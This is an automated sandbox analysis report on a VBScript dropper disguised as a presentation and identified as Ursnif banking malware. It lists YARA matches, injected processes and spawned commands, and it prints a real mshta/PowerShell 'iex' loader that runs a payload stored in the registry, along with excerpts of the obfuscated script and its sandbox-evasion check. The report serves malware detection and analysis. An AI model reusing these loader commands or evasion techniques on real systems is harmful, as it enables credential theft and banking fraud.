Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

System Summary:

barindex
Contains functionality to call native functions
Source: C:\Windows\explorer.exe Code function: 36_2_04CF6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 36_2_04CF6F64
Source: C:\Windows\explorer.exe Code function: 36_2_04CE33F8 NtQueryInformationProcess, 36_2_04CE33F8
Source: C:\Windows\explorer.exe Code function: 36_2_04D21003 NtProtectVirtualMemory,NtProtectVirtualMemory, 36_2_04D21003
Source: C:\Windows\System32\control.exe Code function: 37_2_005568E0 NtReadVirtualMemory, 37_2_005568E0
Source: C:\Windows\System32\control.exe Code function: 37_2_005670B8 NtMapViewOfSection, 37_2_005670B8
Source: C:\Windows\System32\control.exe Code function: 37_2_00561154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, 37_2_00561154
Source: C:\Windows\System32\control.exe Code function: 37_2_005729D0 NtAllocateVirtualMemory, 37_2_005729D0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055C188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 37_2_0055C188
Source: C:\Windows\System32\control.exe Code function: 37_2_00569B08 NtCreateSection, 37_2_00569B08
Source: C:\Windows\System32\control.exe Code function: 37_2_005533F8 NtQueryInformationProcess, 37_2_005533F8
Source: C:\Windows\System32\control.exe Code function: 37_2_00552CC0 NtQueryInformationProcess, 37_2_00552CC0
Source: C:\Windows\System32\control.exe Code function: 37_2_00557F44 NtWriteVirtualMemory, 37_2_00557F44
Source: C:\Windows\System32\control.exe Code function: 37_2_00566F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_00566F64
Source: C:\Windows\System32\control.exe Code function: 37_2_00591003 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_00591003
Detected potential crypto function
Source: C:\Windows\explorer.exe Code function: 36_2_04CFAE80 36_2_04CFAE80
Source: C:\Windows\explorer.exe Code function: 36_2_04CF2F90 36_2_04CF2F90
Source: C:\Windows\explorer.exe Code function: 36_2_04CE7CCC 36_2_04CE7CCC
Source: C:\Windows\explorer.exe Code function: 36_2_04CE34A0 36_2_04CE34A0
Source: C:\Windows\explorer.exe Code function: 36_2_04CEBC1C 36_2_04CEBC1C
Source: C:\Windows\explorer.exe Code function: 36_2_04CF7434 36_2_04CF7434
Source: C:\Windows\explorer.exe Code function: 36_2_04CE3D81 36_2_04CE3D81
Source: C:\Windows\explorer.exe Code function: 36_2_04CFEDA0 36_2_04CFEDA0
Source: C:\Windows\explorer.exe Code function: 36_2_04CEB55C 36_2_04CEB55C
Source: C:\Windows\explorer.exe Code function: 36_2_04D0FD7C 36_2_04D0FD7C
Source: C:\Windows\explorer.exe Code function: 36_2_04CF7D60 36_2_04CF7D60
Source: C:\Windows\explorer.exe Code function: 36_2_04CE4578 36_2_04CE4578
Source: C:\Windows\explorer.exe Code function: 36_2_04D0AD28 36_2_04D0AD28
Source: C:\Windows\explorer.exe Code function: 36_2_04D02E04 36_2_04D02E04
Source: C:\Windows\explorer.exe Code function: 36_2_04CE5628 36_2_04CE5628
Source: C:\Windows\explorer.exe Code function: 36_2_04CE8FC8 36_2_04CE8FC8
Source: C:\Windows\explorer.exe Code function: 36_2_04CF9FD0 36_2_04CF9FD0
Source: C:\Windows\explorer.exe Code function: 36_2_04D0DFF8 36_2_04D0DFF8
Source: C:\Windows\explorer.exe Code function: 36_2_04CF07AC 36_2_04CF07AC
Source: C:\Windows\explorer.exe Code function: 36_2_04CEAF44 36_2_04CEAF44
Source: C:\Windows\explorer.exe Code function: 36_2_04D01F74 36_2_04D01F74
Source: C:\Windows\explorer.exe Code function: 36_2_04CE9F7C 36_2_04CE9F7C
Source: C:\Windows\explorer.exe Code function: 36_2_04CE4734 36_2_04CE4734
Source: C:\Windows\explorer.exe Code function: 36_2_04D0D72C 36_2_04D0D72C
Source: C:\Windows\explorer.exe Code function: 36_2_04D0B0F8 36_2_04D0B0F8
Source: C:\Windows\explorer.exe Code function: 36_2_04D0F8E8 36_2_04D0F8E8
Source: C:\Windows\explorer.exe Code function: 36_2_04D08844 36_2_04D08844
Source: C:\Windows\explorer.exe Code function: 36_2_04CE207C 36_2_04CE207C
Source: C:\Windows\explorer.exe Code function: 36_2_04CE8824 36_2_04CE8824
Source: C:\Windows\explorer.exe Code function: 36_2_04D059F8 36_2_04D059F8
Source: C:\Windows\explorer.exe Code function: 36_2_04CEC188 36_2_04CEC188
Source: C:\Windows\explorer.exe Code function: 36_2_04CE3908 36_2_04CE3908
Source: C:\Windows\explorer.exe Code function: 36_2_04D0610C 36_2_04D0610C
Source: C:\Windows\explorer.exe Code function: 36_2_04CEA2EC 36_2_04CEA2EC
Source: C:\Windows\explorer.exe Code function: 36_2_04D082E0 36_2_04D082E0
Source: C:\Windows\explorer.exe Code function: 36_2_04CF6A74 36_2_04CF6A74
Source: C:\Windows\explorer.exe Code function: 36_2_04D0D26C 36_2_04D0D26C
Source: C:\Windows\explorer.exe Code function: 36_2_04CFCA04 36_2_04CFCA04
Source: C:\Windows\explorer.exe Code function: 36_2_04CF021C 36_2_04CF021C
Source: C:\Windows\explorer.exe Code function: 36_2_04CF0BB0 36_2_04CF0BB0
Source: C:\Windows\explorer.exe Code function: 36_2_04D00354 36_2_04D00354
Source: C:\Windows\explorer.exe Code function: 36_2_04CFE35C 36_2_04CFE35C
Source: C:\Windows\explorer.exe Code function: 36_2_04D09344 36_2_04D09344
Source: C:\Windows\explorer.exe Code function: 36_2_04CE7B14 36_2_04CE7B14
Source: C:\Windows\explorer.exe Code function: 36_2_04CFC324 36_2_04CFC324
Source: C:\Windows\explorer.exe Code function: 36_2_04D21570 36_2_04D21570
Source: C:\Windows\System32\control.exe Code function: 37_2_0055C188 37_2_0055C188
Source: C:\Windows\System32\control.exe Code function: 37_2_0056AE80 37_2_0056AE80
Source: C:\Windows\System32\control.exe Code function: 37_2_00562F90 37_2_00562F90
Source: C:\Windows\System32\control.exe Code function: 37_2_00578844 37_2_00578844
Source: C:\Windows\System32\control.exe Code function: 37_2_0055207C 37_2_0055207C
Source: C:\Windows\System32\control.exe Code function: 37_2_00558824 37_2_00558824
Source: C:\Windows\System32\control.exe Code function: 37_2_0057B0F8 37_2_0057B0F8
Source: C:\Windows\System32\control.exe Code function: 37_2_0057F8E8 37_2_0057F8E8
Source: C:\Windows\System32\control.exe Code function: 37_2_0057610C 37_2_0057610C
Source: C:\Windows\System32\control.exe Code function: 37_2_00553908 37_2_00553908
Source: C:\Windows\System32\control.exe Code function: 37_2_005759F8 37_2_005759F8
Source: C:\Windows\System32\control.exe Code function: 37_2_00566A74 37_2_00566A74
Source: C:\Windows\System32\control.exe Code function: 37_2_0057D26C 37_2_0057D26C
Source: C:\Windows\System32\control.exe Code function: 37_2_0056021C 37_2_0056021C
Source: C:\Windows\System32\control.exe Code function: 37_2_0056CA04 37_2_0056CA04
Source: C:\Windows\System32\control.exe Code function: 37_2_005782E0 37_2_005782E0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055A2EC 37_2_0055A2EC
Source: C:\Windows\System32\control.exe Code function: 37_2_00570354 37_2_00570354
Source: C:\Windows\System32\control.exe Code function: 37_2_0056E35C 37_2_0056E35C
Source: C:\Windows\System32\control.exe Code function: 37_2_00579344 37_2_00579344
Source: C:\Windows\System32\control.exe Code function: 37_2_00557B14 37_2_00557B14
Source: C:\Windows\System32\control.exe Code function: 37_2_0056C324 37_2_0056C324
Source: C:\Windows\System32\control.exe Code function: 37_2_00560BB0 37_2_00560BB0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055BC1C 37_2_0055BC1C
Source: C:\Windows\System32\control.exe Code function: 37_2_00567434 37_2_00567434
Source: C:\Windows\System32\control.exe Code function: 37_2_00557CCC 37_2_00557CCC
Source: C:\Windows\System32\control.exe Code function: 37_2_005534A0 37_2_005534A0
Source: C:\Windows\System32\control.exe Code function: 37_2_0055B55C 37_2_0055B55C
Source: C:\Windows\System32\control.exe Code function: 37_2_0057FD7C 37_2_0057FD7C
Source: C:\Windows\System32\control.exe Code function: 37_2_00554578 37_2_00554578
Source: C:\Windows\System32\control.exe Code function: 37_2_00567D60 37_2_00567D60
Source: C:\Windows\System32\control.exe Code function: 37_2_0057AD28 37_2_0057AD28
Source: C:\Windows\System32\control.exe Code function: 37_2_00553D81 37_2_00553D81
Source: C:\Windows\System32\control.exe Code function: 37_2_0056EDA0 37_2_0056EDA0
Source: C:\Windows\System32\control.exe Code function: 37_2_00572E04 37_2_00572E04
Source: C:\Windows\System32\control.exe Code function: 37_2_00555628 37_2_00555628
Source: C:\Windows\System32\control.exe Code function: 37_2_0055AF44 37_2_0055AF44
Source: C:\Windows\System32\control.exe Code function: 37_2_00571F74 37_2_00571F74
Source: C:\Windows\System32\control.exe Code function: 37_2_00559F7C 37_2_00559F7C
Source: C:\Windows\System32\control.exe Code function: 37_2_00554734 37_2_00554734
Source: C:\Windows\System32\control.exe Code function: 37_2_0057D72C 37_2_0057D72C
Source: C:\Windows\System32\control.exe Code function: 37_2_00569FD0 37_2_00569FD0
Source: C:\Windows\System32\control.exe Code function: 37_2_00558FC8 37_2_00558FC8
Source: C:\Windows\System32\control.exe Code function: 37_2_0057DFF8 37_2_0057DFF8
Source: C:\Windows\System32\control.exe Code function: 37_2_005607AC 37_2_005607AC
Java / VBScript file with very long strings (likely obfuscated code)
Source: my_presentation_96642.vbs Initial sample: Strings found which are bigger than 50
PE file does not import any functions
Source: a11zr31h.dll.32.dr Static PE information: No import functions for PE file found
Source: x0s3qhtp.dll.34.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@24/51@4/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{4B9FB8E4-F8AF-11EA-90E2-ECF4BB862DED}.dat Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{226BE949-19F0-A41A-B376-5D18970AE1CC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{2AD27732-815B-ECFE-5BFE-45E0BF124914}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_01
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: my_presentation_96642.vbs Virustotal: Detection: 14%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync Jump to behavior
Source: my_presentation_96642.vbs Static file information: File size 1185685 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.623592484.000001DE2A0D0000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.634178793.000001EE050C0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
Source: Binary string: c:\25\Ready\death\Soil\Original\41\84\Play\49\Believe\settle\gun\shout\24\note.pdb source: Greenbelt.iso.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptFullName)kieGl = iHLOpqas.ReadalliHLOpqas.close'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0))REM wildcatter something155 stratus briefcase Kikuyu prostitute chivalrous sextic Springfield embouchure bronze Hiawatha Hester airman weatherstripping quiver955 sob Kingsbury799 agreeable Chiang juncture Frankel custody imagine Clare garlic molecular gloss, 158521 Raul Walpole desolater ambulant jilt voluptuous, knoll lampoon Calkins194 somatic bonze megavolt tortoiseshell defector. Allan mock refrain wineskin onyx milt commutate spalding179 fanout urban bylaw fright lucrative355 competitor Venetian clattery Gaberones effaceable Russell221 typewrite Lagos Romania caching battalion taverna breast Blackburn peril pianissimo inquisitive roughshod gabbro758 hillmen digit roughen781. 3555716 interstitial 'MsgBox(ubound(Split (kieGl,vbCrlf))+(((261 - 255.0) + 228.0) - (234 - 1.0)))'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0) - ubound(Split (kieGl,vbCrlf))+((41 + (5 + 742.0)) - (66 + 721.0)))' wine tenement remediable middlemen gunsling Wichita prime lorry lead hurty, bivalve752 constant contiguous anthracnose pentagonal elevate Delphi abjure seam Baltic Costa Compagnie, substantiate either, 8158269 spout subject gobbledygook circumspect faze winch Westfield265, 7567782 bomb brow anarch Menorca contemporaneous wreak, 6643695 torrid echoes maudlin mangy ice plummet anchovy xylene313 Charta Leyden Mercedes ethnic995 mouthpart. 733637 Stearns book761 cook, forthcoming, flinty Johannes soapy Ballard334 Margery conclude retrofitting alias asylum451 exemplary Jude201 troff End FunctionFunction cohere844()on error resume nextIf (InStr(WScript.ScriptName, cStr(395578831)) > 0 And YMkye = 0) ThenExit FunctionEnd IfSet Missy965Service = GetObject("winmgmts:\\.\root\cimv2")Set XNhKYlItems = Missy965Service.ExecQuery("Select * from Win32_Processor", , (((79 + 10.0) + (0.0)) - (160 - 119.0)))For Each chaste In XNhKYlItemsIf chaste.NumberOfCores < ((61 + (-25.0)) + (-((154 - 76.0) + (-45.0)))) Thenscreech176 = TrueEnd IfREM contretemps sardonic crew pilfer criterion qs clairvoyant minnow Babylon516 pitfall Ryan153 whore chairwoman polyphony, Bushnell378 lineage calumny138 violent Daytona whiplash soma404 combustion differentiate Waring Eisenhower airman573 neednt812 flowchart radius300 Bridget, squirmy hop indent MacArthur penal489 Christ stylus prestige taxation peat shako591 drib axe. wigwam path349 carton sickle, honorific yipping, pitchblende418 harrow baroness brisk wane racemose piano sparrow arm63 absolute. clinch embower934, Kemp dig quizzing coachwork, 1152283 Whippany eight465 molasses horseplay381 scapular counterpoint dehydrate acclamation radices Next' archipelago accord landlady. diagrammed trellis additive oceanic correct. 9674830 TWA465, 4289949 ware oboe boatyard advisee, Pomona hydrogenate flan939 shish. alphabet homestead dogmatist niggle draft copperhead cryptanalysis swamp Elkhart accurate cherubim illimitable212. 437
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\explorer.exe Code function: 36_2_04CF5699 push 3B000001h; retf 36_2_04CF569E
